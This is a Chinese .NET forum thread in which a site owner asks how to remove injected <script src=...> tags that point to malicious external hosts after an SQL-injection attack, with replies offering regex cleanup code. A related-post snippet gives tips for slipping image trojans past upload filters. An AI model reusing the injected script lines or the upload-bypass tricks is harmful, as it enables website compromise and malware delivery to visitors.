等文字", "upDate": "2021-05-28T15:26:22+08:00" }

请问asp.net中如何屏蔽等文字

jiaxianglei 2009-02-17 04:03:36
<script src=http://cn.daxia123.cn/cn.js></script>
<script src=http://cn.jxmmtv.com/cn.js></script>
<script src=http://3bom%62.com/c.js></script>
<script src=http://e6t.3322.org/c.js></script>
只要发现<script开头</script>结尾的就删除这些文字,如何实现?
...全文
356 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
shalen520 2009-02-17
  • 打赏
  • 举报
 回复
呵呵,被注入了,还是先找到注入点,再采取相应措施处理
张炜的技术博客 2009-02-17
  • 打赏
  • 举报
 回复
防止sql 注入.对于get/post方式的参数.判断一下.
System.Web.HttpContext.Current.Request.QueryString get方式参数集合
System.Web.HttpContext.Current.Request.Form post方式参数集合.
然后在循环判断一下就可以了
周公 2009-02-17
  • 打赏
  • 举报
 回复
这些都是在数据库中吧,你的程序存在SQL注入漏洞,修复一下吧,然后在数据库中替换一下。
编程有钱人了 2009-02-17
  • 打赏
  • 举报
 回复 


public string NoHTML(string Htmlstring) //去除HTML标记  

    {  

        //删除脚本  

        Htmlstring = Regex.Replace(Htmlstring, @" <script[^>]*?>.*? </script>",string.Empty, RegexOptions.IgnoreCase);  

        //删除HTML  

        Htmlstring = Regex.Replace(Htmlstring, @" <(.[^>]*)>",string.Empty, RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"([\r\n])[\s]+",string.Empty, RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"-->",string.Empty, RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @" <!--.*",string.Empty, RegexOptions.IgnoreCase);  



        Htmlstring = Regex.Replace(Htmlstring, @"&(quot|#34);", "\"", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(amp|#38);", "&", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(lt|#60);", " <", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(gt|#62);", ">", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(nbsp|#160);"," ", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(iexcl|#161);", "\xa1", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(cent|#162);", "\xa2", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(pound|#163);", "\xa3", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&(copy|#169);", "\xa9", RegexOptions.IgnoreCase);  

        Htmlstring = Regex.Replace(Htmlstring, @"&#(\d+);",string.Empty, RegexOptions.IgnoreCase);  



        Htmlstring.Replace(" <",string.Empty);  

        Htmlstring.Replace(">",string.Empty);  

        Htmlstring.Replace("\r\n",string.Empty);  

        Htmlstring = HttpContext.Current.Server.HtmlEncode(Htmlstring).Trim();  

        return Htmlstring;  

    }
wanghao3616 2009-02-17
  • 打赏
  • 举报
 回复 


//删除脚本

Htmlstring = Regex.Replace(Htmlstring, @"<script[^>]*?>.*?</script>", "",

    RegexOptions.IgnoreCase);
asp 网站被 sql 注入后的处理办法。
1、varchar 类型的直接replace一下就ok了。 如:"update [t_information] set publisher=replace(publisher, '<script src=http://cn.daxia123.cn/cn.js></sc...
二进制SQL注入漏洞分析
摘自:http://blog.csdn.net/tkjune/archive/2009/01/03/3687728.aspx 发现代码并无出奇, 只是将几年前的冷饭再炒.因为多年过去了, 可能有人疏忽, 多试一些总有人招的. 注入方式数字字段是最容易进入的. ...
网站集锦
mcs-51单片机技术学习: ...听说过ewb吧,有比它更完整的"Multisim"200多M等你去下,还奉送文版教程,我已在用了,哈哈,美极了 http://218.7.17.204/fei/2.htm Protel经典图书专辑,哈哈,穷小子不用跑书店了拉 ...
网站集锦-电子
听说过ewb吧,有比它更完整的"Multisim"200多M等你去下,还奉送文版教程,我已在用了,哈哈,美极了 http://218.7.17.204/fei/2.htm Protel经典图书专辑,哈哈,穷小子不用跑书店了拉 http://218.7.17.204/chaoxing/7.htm...
新手入侵笔记
1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls  2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。  3.上传图片木马把地址复制到...
.NET社区

62,046

社区成员

669,048

社区内容

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧

+ 用AI写文章